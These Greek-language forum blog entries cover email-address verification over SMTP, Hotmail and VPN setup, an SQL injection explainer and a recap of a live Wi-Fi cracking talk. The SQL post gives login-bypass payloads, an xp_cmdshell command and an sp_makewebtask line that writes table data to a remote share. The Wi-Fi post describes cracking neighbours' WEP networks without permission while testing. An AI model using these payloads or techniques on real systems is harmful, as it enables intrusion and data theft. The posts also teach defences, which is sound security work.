Jump to content

Blackman

Members
  • Posts

    1970
  • Joined

  • Last visited

  • Days Won

    15

Blog Entries posted by Blackman

  1. Blackman
    Πρόσφατα αναζητούσα τον λόγο γιατί ένας υπολογιστής φαινόταν να μην έχει στείλει κάποια emails, παρόλο που φαινόντουσαν ότι είχαν φύγει. Το πρώτο πράγμα που ρώτησα τον χρήστη είναι το αν θα μπορούσαμε να στείλουμε δοκιμαστικό email και μετά να πάρουμε και ένα τηλέφωνο επιβεβαίωσης. Ο συνάδελφος μου είπε ότι κάτι τέτοιο δεν πρέπει να γίνει για πολλούς και διάφορους λόγους.
    Οπότε πριν ξεκινήσω να ελέγχω οτιδήποτε θα έπρεπε να ελέγξω αν αυτές οι 5 διευθύνσεις που μου έδωσε ο χρήστης είναι valid και χωρίς να στείλω email. Τα πράγματα είναι απλά και γίνονται με την χρήση της εντολής nslookup και την χρήση telnet.
    ΠΩΣ ΓΙΝΕΤΑΙ;
    Αρχικά πρέπει να βρούμε τον mail exchange του domain που μας ενδιαφέρει.
    Οπότε αν μιλάμε για ένα email λογαριασμό [email protected]
    τότε θα πρέπει να γράψουμε
    nslookup -q=mx blackdomain.com
    η απάντηση που θα πάρουμε θα πρέπει να είναι της μορφής…
    blackdomain.com MX preference = 10, mail exchanger = mail.blackdomain.com
    mail.blackdomain.com internet address = 208.96.53.76

    Στην συνέχεια συνδεόμαστε στον mail server mail.blackdomain.com
    telnet mail.blackdomain.com 25
    και πέρνουμε απάντηση τύπου…
    220 mail.blackdomain.com ESMTP Postfix NO UCE NO UEMA C=US L=CA Unsolicated electronic mail advertisements strictly prohibited, subject to fine under CA law CBPC 17538.45. This electronic mail service provider’s equipment is located in the State of California. See http://www.blackdomain.com/static/inbound-email-policy.html for more information.
    συνεχίζουμε και μιλάμε με το σύστημα γράφοντας…
    helo hi
    και παίρνουμε απάντηση τύπου…
    250 mail.blackdomain.com

    στην συνέχεια ελέγχουμε αν το σύστημα μπορεί να δεχτεί email από συγκεκριμένη διεύθυνση…
    mail from: [email protected]
    με απάντηση…
    250 2.1.0 Ok
    Οπότε μετά μπορούμε να ρωτήσουμε αν υπάρχει το mailbox που ψάχνουμε…
    rcpt to: [email protected]

    με απάντηση (αν δεν υπάρχει ή κάτι σχετικό):
    550 5.1.1 [email protected]: Recipient address rejected: User unknown in local recipient table.
    και μετά κλείνουμε την σύνδεση με την εντολή quit.
    ΠΑΡΑΤΗΡΗΣΕΙΣ:
    1) Το νούμερο 550 σημαίνει ότι η διεύθυνση συντακτικά είναι σωστή, αλλά λάθος σαν ύπαρξη mailbox.
    2) Εάν υπάρχει ο συγκεκριμένος λογαριασμός τότε η απάντηση δεν θα έδινε 550, αλλά 250.
    3) Ο συγκεκριμένος τρόπος δεν ενδείκνυται για χρήση σε gmail ή yahoo ή ότι άλλο τέτοιου τύπου, καθώς η IP σας μπορεί να καταλήξει σε κάποια blacklist.

    Ελπίζω να φανεί και σε άλλους χρήσιμο.
  2. Blackman
    Επειδή έχω καταλάβει ότι αρκετοί δεν το γνωρίζουν και από συνήθεια ρυθμίζουν το hotmail τους σαν POP3, θα ήθελα να τους ενημερώσω ότι μπορούν να ξεφύγουν από αυτό και να το ρυθμίσουν ως Microsoft Exchange.
    το μοναδικό που πρέπει να βάλετε είναι όταν σας ζητήσει τον server
    m.hotmail.com και το full email account σας στο Username


    στην συνέχεια έχετε πλήρη πρόσβαση στο email σας με όλους τους υποφακέλους και όλη την δομή, καθώς επίσης και αντίστοιχα τις επαφές σας και το ημερολόγιο σας. Συνεπώς τέλος και στα unread emails που ήδη έχετε διαβάσει από τον υπολογιστή σας κλπ.
    Enjoy
  3. Blackman
    Ξεκινάω το συγκεκριμένο post για να δείτε πως γίνεται το hack που ονομάζεται SQL Injection, καθώς επίσης και διάφοροι τρόποι που προτείνονται για να αποφευχθεί κάτι τέτοιο και διάφορα άλλα. Σκοπός μου είναι να δώσω την εικόνα του συγκεκριμένου hack, αλλά αν θέλετε να μάθετε να το κάνετε θα πρέπει να το ψάξετε περισσότερο μόνοι σας.

    Τι είναι SQL Injection attack

    Όπως μπορείτε να βρείτε και στο Wikipedia, μιλάμε για μία τεχνική η οποία εκθέτει αδυναμίες στην ασφάλεια (security vulnerability exploit) μίας βάσης δεδομένων. Η συγκεκριμένη ‘τρύπα’ έχει να κάνει με το τρόπο που φιλτράρονται οι χρήστες ή γιατί τα usernames δεν είναι strongly typed. Οι επιθέσεις αυτές είναι επίσης γνωστές και ως SQL Insertion attacks.

    Μόλις ο hacker αποκτήσει πρόσβαση, τότε μπορεί να εκτελέσει ότι query θέλει πάνω στην βάση δεδομένων. Συνεπώς και να τραβήξει ή να αλλάξει όποια πληροφορία θέλει.

    SQL Injection FAQ

    Ε:Τι χρειάζεται κάποιος για να κάνει την παραπάνω επίθεση;

    Α:Απλά έναν web browser.

     

    Ε:Τι πρέπει να ψάξει για να κάνει κάποιος τη συγκεκριμένη επίθεση;

    Α:Σελίδες που επιτρέπουν την εισαγωγή δεδομένων όπως login page, search page, feedback κλπ. Μερικές φορές ακόμα και HTML σελίδες χρησιμοποιούν POST εντολές για να στείλουν τις σχετικές παραμέτρους σε κάποια σελίδα ASP. Οπότε σε αυτή την περίπτωση δεν θα δείτε τις παραμέτρους αυτές στην URL, αλλά μόνο αν ελέγξετε τον source code και ψάξετε και βρείτε το σημείο “FORM” μέσα στον κώδικα πχ

    <FORM action=Search/search.asp method=post>
    <input type=hidden name=A value=C>
    </FORM>

    Οτιδήποτε υπάρχει μεταξύ FORM & /FORM είναι πιθανές παράμετροι που θα μπορεί κάποιος να χρησιμοποιήσει.

     

    Ε:Τι γίνεται αν δεν βρίσκουμε σελίδα που να δέχεται εισαγωγή δεδομένων;

    A:Θα πρέπει να ψάξετε σελίδα ASP, JSP, CGI ή PHP. Αυτό που θα πρέπει να ψάχνει κάποιος είναι σελίδες όπως:

    http://autoexec.gr/index.asp?id=10

     

    E:Πως θα δοκιμάσουμε αν υπάρχει ‘τρύπα’

    A:Δοκιμάστε να γράψετε hi' or 1=1--

    αυτό μπορεί να είναι στο Login, στο Password ή ακόμα και την URL

    πχ http://autoexec.gr/index.asp?id=hi' or 1=1--

     

    E:Αλλά γιατί ' or 1=1--;

    Α:Πέραν του ότι μπορεί να γίνει bypass το login, είναι πιθανόν να δει κάποιος επιπλέον πληροφορίες που συνήθως δεν είναι διαθέσιμες. Αν πχ παμε σε μία σελίδα που έχει link σε μία άλλη σελίδα όπως http://autoexec.gr/index.asp?category=hardware

    Βλέπουμε ότι στο URL η μεταβλητή είναι το category, ενώ το hardware είναι η τιμή για την μεταβλητή. Αυτό που πλευρά κώδικα θα εμπεριέχει κώδικα σαν και τον παρακάτω:

    v_cat = request(“category")

    sqlstr=”SELECT * FROM hardwr WHERE PCategory=’” & v_cat & “’”

    set rs=conn.execute(sqlstr)

    Έτσι με το παραπάνω το SQL που ουσιαστικά αντιστοιχεί τον συγκεκριμένο κώδικα μπορεί να γίνει:

    SELECT * FROM hardwr WHERE PCategory=’hardware’

    όπου το query θα φέρει πίσω αποτελέσματα για το hardware.

    Οπότε σε αυτή την περίπτωση αν πάρουμε το url

    http://autoexec.gr/index.asp?category=hardware' or 1=1--

    Τώρα η μεταβλητή v_cat αντιστοιχεί στο "hardware' or 1=1--", οπότε αν το βάλουμε αυτό σε SQL query, θα έχουμε

    SELECT * FROM hardwr WHERE Pcategory=’hardware’ or 1=1--‘

    Τι έχουμε σε αυτή την περίπτωση; Ότι το query θα μας φέρει τα πάντα από τον πίνακα hardwr ασχέτως αν είναι ίσο με το hardware ή όχι. Η διπλή παύλα (--) λέει στον MS SQL server να αγνοήσει το υπόλοιπο query, το οποίο με την σειρά του θα παρατήσει το τελευταίο quote (‘). Μερικές φορές η διπλή παύλα μπορεί να αντικατασταθεί με το σύμβολο της δίεσης (#).

    Παρόλα αυτά όμως, αν δεν είναι SQL server ή δεν μπορείς (ή δεν θες) να αγνοήσεις το υπόλοιπο query, μπορούμε επίσης να δοκιμάσουμε να βάλουμε

    ‘ or 'a'='a

    Οπότε το SQL query θα γίνει:

    SELECT * FROM hardwr WHERE PCategory=’hardware’ or ‘a’=’a’

    Και θα έχουμε το ίδιο αποτέλεσμα.

    Αντίστοιχα μπορείτε να δοκιμάσετε

    ‘ or 1=1--

    “ or 1=1--

    or 1=1--

    ‘ or ‘a’=’a

    “ or “a”=”a

    ‘) or (‘a"=‘a

     

    E:Μπορώ να αποκτήσω δυνατότητα απομακρυσμένη εκτέλεσης με SQL Injection;

    Α:Οι χρήστες SQL και δη οι developers, γνωρίζουν ότι ο SQL είναι ένα πολύ δυνατό εργαλείο και αυτό γιατί τους δίνει την δυνατότητα να κάνουν ΤΑ ΠΑΝΤΑ σε ένα σύστημα. Έτσι, επειδή ο SQL Server τρέχει σαν SYSTEM, αυτό σημαίνει ότι τα δικαιώματα που έχει είναι επιπέδου administrator στο σύστημα. Οπότε εύκολα από την στιγμή που μπορούμε να τρέξουμε ότι θέλουμε, με την χρήση stored procedures (που είσαι Αντώνη

    '; exec master..xp_cdmshel ‘ping 10.10.1.2'--

    Σε περίπτωση που το μονό quote δεν δουλεύει, χρησιμοποιήστε διπλό.

    Το ερωτηματικό στην αρχή (η semi colon όπως το λένε στα ξένα) θα τερματίσει το SQL query που εκτελείται εκείνη την ώρα και θα μας επιτρέψει να ξεκινήσουμε μία νέα εντολή SQL. Για την επιβεβαίωση ότι η εντολή εκτελέστηκε σωστά μπορούμε να πάρουμε απάντηση από ping στην IP για να δούμε αν υπάρχει κάποιο πακέτο από τον server:

    #tcpdump icmp

    Αν δεν πάρουμε απάντηση από το Ping (που λέγετε Pong), και έχουμε μήνυμα λάθους που σχετίζεται με δικαιώματα, τότε πιθανόν ο administrator έχει περιορίσει την εκτέλεση των stored procedures στον Web User.

     

    E:Πως μπορώ να πάρω το αποτέλεσμα του query μου;

    Α:Με την χρήση του sp_makewebtask:

    '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMAS.TABLES"

    αλλά να έχετε υπόψη ότι ο φάκελος SHARE που θα βρίσκεται στην IP που θέλουμε πρέπει να έχει sharing pemissions σε Everyone.

     

    Φυσικά υπάρχουν απαντήσεις και σε άλλα ερωτήματα όπως να πάρουμε αποτελέσματα από μία βάση με την χρήση μηνυμάτων λάθους από ODBC ή πως να τραβήξουμε όλα τα ονόματα στηλών από ένα πίνακα, ή πως τραβάμε ότι data θέλουμε, πως να βάλουμε δικά μας data κλπ

    Οπότε καταλαβαίνετε ότι η όλη διαδικασία είναι μεγάλη και φυσικά άμεσα συνδεδεμένη με αυτό που κάνει και ένας developer. Αν για κάποιους δεν σας λένε τίποτα, σίγουρα για άτομα όπως ο Αντώνης του λένε πολλά.

    Αν θέλετε να μάθετε περισσότερα για SQL Injection δείτε τα παρακάτω…

    http://projects.webappsec.org/SQL-Injection

    http://msdn.microsoft.com/en-us/library/ms161953.aspx

    http://net.tutsplus.com/articles/can-you-hack-your-own-site-a-look-at-some-essential-security-considerations/

    http://en.wikipedia.org/wiki/SQL_injection

    http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/#LineCommentAttacks

    http://geniushackers.com/blog/2009/04/08/sql-injection-ultimate-method-for-website-hacking/



     

    ΠΩΣ ΑΠΟΦΕΥΓΟΥΜΕ SQL INJECTIONS.

    Αν διαβάσετε τα παραπάνω θα πάρετε και μία εικόνα για το πρέπει να κάνετε ώστε να αποφύγετε τι ‘κακοτοπιές’ και συνεπώς να μην πέσετε θύμα μίας επίθεσης με SQL Injection. Αλλά θα αναφέρω και κάποια πράγματα και εγώ.

    Φροντίστε να ‘βγάλετε’ (εσείς ή κάποιος developer) εκτός χαρακτήρες όπως quotes, slash, backslash, semi colon, NULL, new line, κλπ και αυτά πρέπει να βγουν από τα εξής:

    1) εισαγωγή από χρήστες σε πεδίο

    2) παραμέτρους στην URL

    3) Τιμές από cookies

    Επίσης κάτι άλλο που προτείνεται είναι το να βεβαιωθείτε ότι όλα τα νούμερα έχουν μετατραπεί σε integer. Επίσης διαγράψτε stored procedures που δεν σας αρέσουν και δεν χρειάζεστε όπως master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask .

     

    ΓΕΝΙΚΑ ΣΥΜΠΕΡΑΣΜΑΤΑ

    Η χρήση SQL Injection καταλαβαίνετε ότι δεν είναι κάτι απλό. Είναι πιθανότατα ένα από τους πιο δυνατούς τρόπους για να κάνει κάποιος hacking και επίσης είναι ο πιο απλός καθώς δεν χρειάζεται ιδιαίτερα εργαλεία, αλλά μονάχα ένας web browser. Από εκεί και πέρα αν κάποιος έχει τις απαραίτητες γνώσεις μπορεί να αποκτήσει πλήρης πρόσβαση στο μηχάνημα, πέραν από τα δεδομένα που μπορεί να έχει η βάση δεδομένων. Αυτό που καταφέρνει να κάνει κάποιος ουσιαστικά είναι να ‘κοροϊδέψει το σύστημα και να του δώσει όλες τις πληροφορίες που ζητάει, και καταλαβαίνετε εύκολα ότι αν το συγκεκριμένο attack συνδυαστεί με Google Hacking η ζωή του επίδοξου hacker γίνεται ακόμα πιο εύκολη.

    Ελπίζω με το παραπάνω να πήρατε μία εικόνα για το τι είναι αυτή η μορφή επίθεσης, οπότε να πάρετε και τα μέτρα σας (όσοι χρειάζεται).

     

    Επιπλέον Links

    http://www.digitaloffense.net/wargames01/IOWargames.ppt
    http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
    http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
    http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

    http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

    http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc

    http://www.owasp.org/asac/input_validation/sql.shtml

    http://www.sensepost.com/misc/SQLinsertion.htm
  4. Blackman
    Διάβασα το άρθρο του Βαγγέλη και δεν κρατήθηκα. Έπρεπε να γράψω και εγώ. Να δώσω και εγώ την δική μου εικόνα και να ευχαριστήσω πολύ κόσμο για αυτό το event. Αρχικά να ευχαριστήσω τους διοργανωτές και δη τα μεγάλα κεφάλια του autoexec.gr (κοινώς moderators) που μου έκαναν την τιμή και με κάλεσαν σε αυτό το τόσο μεγάλο event. Ήταν το πρώτο μου και ευελπιστώ να ακολουθήσουν και άλλα.

    Στην συνέχεια να ευχαριστήσω όλους όσους ήρθαν και παρακολούθησαν την εκδήλωση αυτή και η αίσθηση πραγματικά ήταν ξεχωριστή. Όπως ανέφερα, ήταν η πρώτη μου παρουσίαση, όχι γενικά, αλλά σε τέτοιο κοινό. Πρώτη φορά μίλησα σε συναδέλφους μου και φυσικά το υψηλό επίπεδο των ακροατών μου έδωσε ένα ξεχωριστό συναίσθημα.







    Τέλος να ευχαριστήσω και τους υπόλοιπους ομιλητές, γιατί απλά είναι αυτοί που είναι. Ξεχωριστά άτομα ο καθένας τους. Καθώς ακόμα και τα υπόλοιπα παιδιά, behind the scenes για την εξαιρετική δουλειά τους. Το να ετοιμάζουν όλα αυτά είναι πραγματικά κάτι το ξεχωριστό. Νομίζω όλους τους τους ανέφερε ονομαστικά ο φίλος Βαγγέλης(την Παρασκευή στήναμε μέχρι το πρωί. Πολύ ξενύχτι λέμε)

    Τέλος, last but not least, όπως λένε και οι φίλοι μας οι Αμερικάνοι, πολλά ευχαριστώ στον έτερο συνπαρουσιαστή Γιώργο ‘gspiliot’ Σπιλιώτη για την ωραία ομάδα που φτιάξαμε. Ενώ ο χώρος στο ξενοδοχείο Imperial έπαιξε σημαντικό ρόλο για την επιτυχία της εκδήλωσης.

    Τα πράγματα για εμάς ήρθαν τόσο απλά, όσο ένα τηλεφώνημα…

    -Μπορείς να σπάσεις live ασύρματο δίκτυο;

    -Εύκολα…υπό προϋποθέσεις και ότι πρωτόκολλο θες.

    -Μου αρκεί…

    κάπως έτσι πήραμε το πρώτο οκ, για την παρουσία μας και εφόσον είχαμε δείξει κάποια δουλειά πάνω στο αντικείμενο (όσοι παρακολουθούν το Blog μου καταλαβαίνουν τι εννοώ).

    Η δουλειά για εμάς ξεκίνησε από τον Ιούλιο. Συνεχείς δοκιμές για να hackάρουμε διάφορα δίκτυα και περισσότερο εκεί που δουλεύω, στην Αγία Παρασκευή. Ναι, για τις δοκιμές μας ίσως κάποιος από εσάς να περάσατε από το δικό μας σκανάρισμα και αν είχατε και WEP, τότε συνδεθήκαμε σε εσάς. Στις προσπάθειες μας, σπάσαμε γύρω στα 7 WEP από τα 8 που βρήκαμε εκείνη την περίοδο(ένα δεν είχε καλό σήμα), ενώ επίσης δύο με WPA2 με χρήση password list. (όλα αυτά για να έχουμε real life tests και όχι σε κατάσταση lab)

    Στην συνέχεια, οι επόμενες επαφές έγιναν μαζί με τον Γιώργο τον Σεπτέμβρη, όπου αποφασίσαμε ότι θα δείξουμε και prehashed lists. Αρχικά πήγαμε να κατεβάσουμε μία λίστα που υπάρχει διαθέσιμη στο Internet και είναι μεγέθους 33GB, αλλά στην πορεία αποφασίσαμε να φτιάξουμε δικές μας για να γίνει και πιο εντυπωσιακό το όλο κατόρθωμα. Μας πήρε ΔΥΟ ΜΗΝΕΣ για να ολοκληρωθεί η παραγωγή αυτών των δύο prehashed lists. Δύο λίστες φυσικά που θα γίνουν ανάρπαστες μόλις τις βγάλουμε διαθέσιμες για κατέβασμα.

    Με τι ασχοληθήκαμε; Όσοι παρακολούθησαν γνωρίζουν, αλλά κάποιοι ίσως να μην κατάλαβαν καλά. Η πρώτη και πιο μικρή λίστα, ήταν ΟΛΑ τα ανδρικά ονόματα με συνδυασμούς της ημερομηνίας γέννησης (πχ giwrgos1711980 ή Vangelis1956 ή όποιος άλλος συνδυασμός του ονόματος με κεφαλαία-πεζά και τους σχετικούς τρόπους γραφής καθώς και όλους τους τρόπους γραφής της ημερομηνίας). Ο μοναδικός περιορισμός ήταν ότι βάλαμε ημερομηνίες μετά το 1940.

    Η δεύτερη prehashed list ήταν και η πιο δυνατή, καθώς πολύ απλά φτιάξαμε μία λίστα με ΟΛΑ ΤΑ ΚΙΝΗΤΑ ΤΗΛΕΦΩΝΑ ΤΗΣ ΕΛΛΑΔΑΣ. Ναι, σε αυτή την λίστα θα βρείτε τα κινητά σας και όποιου γνωστούς σας. Η συγκεκριμένη λίστα είναι ένα αρχείο 2GB και γράφτηκε σε Perl ώστε να γίνει ο υπολογισμός όλων των τηλεφώνων. Το σκεπτικό; Απλό. 69ΧΧΧΧΧΧΧΧ όπου Χ, όλα τα νούμερα από την αρχή. Φυσικά βγάλαμε και κάποια εκτός όπως το 691ΧΧΧΧΧΧΧ.

    Με το παραπάνω ουσιαστικά ολοκληρώσαμε μετά από 3 μήνες προετοιμασίας την δουλειά μας και αφοσιωθήκαμε στην παρουσίαση αυτών.

    Για να δούμε τι είδατε στην παρουσίαση μας.



    Τι είναι WEP, WPA, WPA2 Personal/Enterprise

    Πόσο εύκολα μπορεί κάποιος να κάνει την ζημιά, χωρίς ιδιαίτερο εξοπλισμό. Δείξαμε εκεί ένα Asus 701 4G (160€ πωλείται πλέον), το οποίο δεν είχε καν φορτωμένο το σχετικό λογισμικό, αλλά όλα μέσω ενός Live USB stick 1GB με Backtrack 3.

    Ποιο είναι το σκεπτικό που ακολουθείται για να γίνει το wifi hacking (assosiation, deauthentication, ARP capture κλπ)

    Με τι εργαλεία μπορεί να γίνει αυτό. Εμείς παρουσιάσαμε με aircrack-ng πάνω σε Backtrack 4

    Τι να προσέχετε και τι να αποφεύγετε.

    Τι χρειάζεται να έχετε αν θέλετε να δοκιμάσετε εσείς. Περιορισμούς από την ασύρματη κάρτα δικτύου (chipset, drivers κλπ)

    Είδαμε Live Hacking σε WEP και δύο φορές σε WPA2 με password list και με prehashed list.

    Ποια είναι η καλύτερη λύση, ειδικά για επιχειρησιακά περιβάλλοντα.
    Η ροή ήταν η εξής: Τι είναι wifi & τα πρωτόκολλα –> Αλήθειες και ψέματα για wifi hacking –> ανάλυση WEP hacking –> Live WEP hacking –> ανάλυση WPA2 hacking –> live WPA2 hacking (2 τρόποι) –> Τρόποι προστασίας –> WPA 2 Entrerprise (WS2008, NAP, Radius)

    Το πιο εντυπωσιακό της παρουσίασης ήταν όταν σηκώσαμε τον Βαγγέλη και έβαλε το δικό του password στο router, δίνοντας του τις δύο επιλογές που θα έπρεπε να επιλέξει για password (βάση των prehashed lists που είχαμε) και στην συνέχεια εφόσον μαζέψαμε τα σχετικά πακέτα το σπάσαμε σε περίπου δύο λεπτά με την χρήση της πρώτης prehashed λίστας. Ενώ να αναφέρω ότι το WEP που σπάσαμε ήταν ενός δικτύου που έτυχε να υπάρχει στην περιοχή(!!!), ενώ η περίπτωση του σπασίματος με password list έγινε έχοντας συμπληρώσει εμείς την σχετική λέξη σε μία αντίστοιχη λίστα.

    Οι γνώστες πάνω σε ασύρματο hacking και των σχετικών πρωτοκόλλων νομίζω εκτίμησαν περισσότερο το live σπάσιμο, τόσο του WEP, αλλά περισσότερο του WPA2. Οι χρόνοι για να σπάσει ένα κλειδί με ονόματα και ημερομηνίες, όποια και να ήταν αυτά, είναι στα περίπου δύο λεπτά. Ενώ στην περίπτωση που ο ‘στόχος’ χρησιμοποιεί σαν κλειδί το κινητό του, με την άλλη λίστα χρειάζεται μέχρι δέκα λεπτά.



    Η διαφορά μεταξύ μίας password list και μίας prehashed, είναι ότι για κάθε 1000 (χίλια) passwords στην πρώτη περίπτωση χρειάζεται 15 δευτερόλεπτα, ενώ στην περίπτωση prehashed list, θέλει 1 δευτερόλεπτο για να διαβάσει 100000 (εκατό χιλιάδες) passwords.

    Οπότε να ξεκαθαρίσουμε κάτι σε όποιους δεν το κατάλαβαν την ώρα της παρουσίασης.



    Η λίστα με τα κινητά δεν ήταν με τα κινητά όσων ήταν στην παρουσίαση, αλλά ΟΛΗΣ ΤΗΣ ΕΛΛΑΔΑΣ (εννοώντας όλων το ελληνικών εταιρειών παροχής κινητής τηλεφωνίας). (Πρέπει να το ανέφερα πολλές φορές αυτό ε;;

    Όταν τρέχαμε το COWPUTTY (για να σπάσουμε το WPA2 με prehashed) όταν βλέπατε να αλλάζουν νούμερα στο πλάι, ήταν ανά εκατοντάδες χιλιάδες. (Η φωτογραφία πιο πάνω είναι από προσπάθεια αναζήτησης απλής password list)






    Και ενώ μέχρι εδώ και ότι κάναμε με τον Γιώργο χρησιμοποιούσαμε Linux και ο Κλαδάκης είχε βγάλει τις κούκλες Voodoo, μήπως πάθουμε κάτι, ήρθαμε από μόνοι μας να αυτοσωθούμε από τα νύχια του. Ο λόγος είναι ότι η πιο αξιόπιστη λύση αυτή την στιγμή είναι με την χρήση WPA2 Enterprise, κάτι που δίνει ο Windows Server 2008 και στήνεται και σχετικά εύκολα.



     

    Φυσικά το όνομα… HACK MY SPACE… δεν ήταν για να δείξουμε ότι μπορούμε να χακάρουμε το Myspace, αλλά τον προσωπικό χώρο του καθενός.

    Σε αυτό το σημείο να έρθω να παραπονεθώ για αυτόν τον Μέρφυ αλλά και τους νόμους του και να ζητήσω συγνώμη για τις δύο περιπτώσεις που τα πράγματα δεν δούλεψαν όπως έπρεπε. Αλλά αυτό είναι το όμορφο του LIVE, το ότι το κάνει αυθεντικό. Στην πρώτη περίπτωση προσπαθώντας να κάνουμε injection στον WEP δίκτυο, η κάρτα του μηχανήματος μας έβλεπε άλλο κανάλι από αυτό που θα έπρεπε και του είχαμε δηλώσει. Πρόβλημα που κλασικά με μία επανεκκίνηση διορθώθηκε.

    Το δεύτερο έγινε όταν πήγαμε να σπάσουμε το WPA2 με prehashed λίστα με τον κωδικό που είχε βάλει ο Βαγγέλης. Εκεί το πρόβλημα ήταν ότι ο client δεν είχε κάνει σωστά assosiate με το wifi spot (το έβλεπε unsecure), οπότε τότε βάλαμε τον φίλο μας Βαγγέλη να μας πληκτρολογήσει πάλι τον κωδικό του ώστε ο client να συνδεθεί σωστά και εμείς να πάρουμε τα σωστά πακέτα.

    Νομίζω ότι ήμασταν οι μόνοι που ολοκληρώσαμε εντός χρόνου (ε κ. Κλαδάκη και έχοντας δείξει όλα τα πράγματα που θέλαμε. Όχι ότι θα λέγαμε όχι αν μπορούσαμε να σας πούμε αναλυτικά τον τρόπο γραφής των εντολών και την λογική σειρά που ούτως η άλλως αναλύσαμε.

    Ελπίζω να σας άρεσε και να ήσασταν αρκετά αυστηροί στις βαθμολογίες σας με εμάς. Να αναφέρω γιατί κάποιοι με ρώτησαν… στην εισαγωγή μας όπου χρησιμοποίησα το σφυρί για να σπάσω το wifi, ναι…το βαρούσα κανονικά και όχι εικονικά.

    Από εκεί και πέρα περιμένω τις ερωτήσεις σας σε αυτό το Blog Post και φυσικά προτάσεις που θα θέλατε να δείτε σε μελλοντικά blog posts μου ή του gspiliot.

    Σας ευχαριστώ όλους και πάλι.
  5. Blackman
    Για όσους είναι κάτοχοι Cisco router, πολύ πιθανόν να έχουν υλοποιήσει VPN και να έχουν προμηθευτεί το Cisco VPN Client, για να κάνουν αυτή την δουλειά. Μία διαδικασία που δεν χρειάζεται να στείνεις κάποιον VPN server, καθώς με την κατάλληλη παραμετροποίηση την λύση την έχουμε μέσω του ίδιου του router.
    Έτσι στην εταιρεία που εργάζομαι, σε όλα τα laptops βάζαμε το σχετικό Cisco VPN client και έχοντας ρυθμίσει τα απαραίτητα (username & password) ο εκάστοτε χρήστης συνδεόταν στο εταιρικό δίκτυο. Τα πράγματα αρκετό καιρό τώρα δεν προχωρούσαν όπως θα έπρεπε. Καθώς ο Cisco VPN client είναι αποκλειστικά για 32bit συστήματα και ΔΕΝ ΛΕΙΤΟΥΡΓΕΙ ΣΕ 64bit συστήματα.
    Η λύση που δίνει η Cisco, λέγεται AnyConnect VPN Client και είναι φτιαγμένος για να παίζει εύκολα στα 64bit συστήματα. Ωραία θα πει κάποιος, υπάρχει λύση, οπότε που είναι το πρόβλημα; Το πρόβλημα εστιάζεται στο ότι εάν έχετε ήδη υλοποίηση με κάποιο router και δουλεύετε το Cisco VPN client, το AnyConnect VPN Client πιθανότατα να μην παίξει σε εσάς. Το 64bit πρόγραμμα βλέπεται παίζει μονάχα σε ASA (Adaptive Security Appliance) και όχι σε άλλου τύπου router της Cisco. Δηλαδή όσοι έχετε το επονομαζόμενο PIX (Private Internet Exchange Firewall) δεν θα καταφέρεται ποτέ να συνδεθείτε με VPN στο σύστημα σας. Τι σημαίνει αυτό; Απλά…θα πρέπει να αλλάξετε router!!!!
    Οπότε σε αυτή την διαδικασία ξεκίνησα αρκετό καιρό τώρα να ψάχνω λύσεις που θα μου έδιναν συνδεσιμότητα με την εταιρεία μέσω 64bit συστήματος. Λύσεις υπάρχουν διάφορες, όπως το OpenVPN και άλλες. Το πρόβλημα όμως ήταν ότι σε όλες τις σχετικές λύσεις θα έπρεπε να γίνει κάποια εγκατάσταση-παραμετροποίηση σε κάποιο μηχάνημα (server ή client) για να κατάφερνα αυτό που ήθελα.
    Τελικά λύση υπάρχει και είναι πολύ πιο εύκολη. Τόσο εύκολη που απλά κάνεις Import το σχετικό .pcf (profile file) και παίζεις. Η λύση είναι ένας Universal IPsec VPN client που ονομάζεται NCP Secure Entry Client και όπως μπορείτε να δείτε αναφέρεται ότι είναι “First IPsec VPN Client Suite for Windows 7 in the world”. Μπορείτε να το δοκιμάσετε για 30 ημέρες σε full έκδοση και στην συνέχεια εάν σας κάνει να το αγοράσετε με κόστος 120€.
    Αξίζει να σημειωθεί ότι υπάρχουν και οι εξής client:
    NCP Secure Entry Symbian Client (κόστος 69€)
    NCP Secure Entry Windows Mobile Client (κόστος 69€)
    Σε αυτή την περίπτωση το μοναδικό πράγμα που έκανα ήταν Import το pcf αρχείο στο πρόγραμμα αυτό και τέλος. Η διαδικασία μου πήρε 1 δευτερόλεπτο και το σύστημα έπαιξε απροβλημάτιστα. Δεν έστησα τίποτα άλλο, δεν παραμετροποίησα τίποτα απολύτως. Απλά χρησιμοποίησα το συγκεκριμένο πρόγραμμα με το pcf αρχείο που είχα.
    Πλέον θέλω να δοκιμάσω και τους δύο clients για τα κινητά για να δω το πόσο καλά λειτουργούν. Μόλις το κάνω και αυτό θα ενημερώσω αντίστοιχα.
  6. Blackman
    Ήταν πριν τρία χρόνια όταν η Microsoft ανακοίνωσε την συνεργασία της με την Novell. Στο άκουσμα του παραπάνω όλοι κατάλαβαν ότι όλα κινούνται γύρω από την επιχειρηματική λογική. Τι σημαίνει αυτό; Ότι όλα είναι Business baby…
    Δύο εταιρείες που πολλές φορές είχαν έρθει σε ανοιχτή κόντρα, κυρίως για την μονοπωλιακή πολιτική της Microsoft, ήταν πλέον συνεργάτες. Τι έγινε όμως για να φτάσουμε ως εδώ; Η απάντηση είναι… όλοι εμείς. Πελάτες με περίπλοκες εγκαταστάσεις, με windows & linux λειτουργικά, με αρκετό open source και πολλά πολλά άλλα.
    Πολλές εταιρείες αποφάσιζαν να χρησιμοποιήσουν πχ έναν Linux email server, χωρίς όμως ποτέ να υπολογίσουν το όποιο κόστος για να καταφέρουν όλο το παραπάνω να δουλέψει με το υπόλοιπο δίκτυο. Έτσι είχαμε εγκαταστάσεις παρατημένες, γιατί ο πρώην admin ήξερε να χρησιμοποιεί linux, αλλά ο νέος έχει γνώσεις για Exchange και το αφεντικό δεν θέλει να γίνει migration (άλλη περίπτωση αυτή) αλλά το σύστημα να δουλεύει. Ο νέος admin στην συνέχεια έχει γίνει μοναχός στο Άγιο Όρος από τις προσευχές για να μην πάθει τίποτα ο mail server.
